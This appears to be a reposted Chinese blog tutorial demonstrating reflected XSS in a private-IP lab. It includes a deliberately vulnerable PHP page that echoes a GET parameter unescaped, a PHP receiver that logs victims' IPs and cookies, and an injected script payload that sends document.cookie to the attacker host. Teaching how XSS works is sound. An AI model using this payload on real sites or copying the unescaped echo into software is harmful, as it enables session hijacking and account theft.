• XSS跨站脚本攻击过程最简单演示


    转载自https://www.100txy.com/article/86.html
    大多数人对于XSS的原理有一个基本认识,这里不再重复,只给出一个能够演示其原理的完整样例。

    1 角色分配

    有XXS漏洞的网站,IP地址172.16.35.135,PHP为开发语言

    受害访问者,IP地址172.16.35.220,浏览器为IE11

    黑客的数据接收网站,IP地址172.16.2.192,PHP为开发语言

    2 源码实例

    2.1 漏洞网站

    存在漏洞的URL为:http://172.16.35.135/xss_demo.php

    <?php  
    session_start();  
    ?>  
    <!doctype html>  
    <html>  
        <head>  
            <title>XSS demo</title>  
        </head>  
        <body>  
        <form>  
        <input style="300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />  
                <input type="submit" value="Submit" />  
            </form>  
        </body>  
    </html>  
    

    该网页把用户通过GET发送过来的表单数据,未经处理直接写入返回的html流,这就是XSS漏洞所在。

    2.2 黑客接收网站

    接收网站的URL为http://172.16.2.192/xss_hacker.php

    <?php  
    $victim = 'XXS得到的 cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];  
    file_put_contents('xss_victim.txt', $victim);  
    

    把受害用户的IP地址和访问漏洞网站时使用的cookie,一起写入xss_victim.txt文件保存备用。

    2.3 用户正常访问

    用户使用IE11访问网站。现在网站一般都采用session+cookie来保存用户登录信息,网站通过验证cookie来确实是否是合法已登录用户,所以cookie是用户的敏感数据.

    3 攻击过程

    3.1 黑客准备攻击字符串,构造攻击URL

    黑客可以通过各种扫描工具或者人工输入来找到有XSS漏洞的网站URL,然后精心构造攻击字符串。对于本例来说构造出来的字符串为:

    "/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--
    
  • 相关阅读:
    18.中介者模式
    17.迭代器模式
    16.解释器模式
    15.命令模式
    Git超详细用法,通俗易懂
    CSS Sprites精灵图(雪碧图)
    小程序被冻结,忘记原始ID,如何找回?
    vue组件-视频播放之video.js
    基础设计模式-04 复杂对象创建的建造器模式
    基础设计模式-03 从过滤器(Filter)校验链学习职责链模式
  • 原文地址:https://www.cnblogs.com/faberbeta/p/13713979.html
Copyright © 2020-2023  润新知